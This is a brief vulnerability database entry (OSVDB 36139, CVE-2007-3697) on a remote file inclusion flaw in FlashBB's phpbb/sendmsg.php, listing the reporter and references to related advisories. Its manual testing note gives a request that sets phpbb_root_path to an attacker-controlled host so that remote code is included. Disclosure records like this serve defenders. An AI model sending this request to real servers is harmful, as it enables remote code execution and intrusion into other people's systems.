FlashBB phpbb/sendmsg.php phpbb_root_path Variable Remote File Inclusion

2007-07-10T18:37:42
ID OSVDB:36139
Type osvdb
Reporter kw3rln(office[at]rosecuritygroup[dot]net)
Modified 2007-07-10T18:37:42

Description

Manual Testing Notes

http://[target]/[path]/phpbb/sendmsg.php?phpbb_root_path=[attacker]

References:

Secunia Advisory ID:26007 Other Advisory URL: http://milw0rm.com/exploits/4169 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0073.html FrSIRT Advisory: ADV-2007-2514 CVE-2007-3697 Bugtraq ID: 24842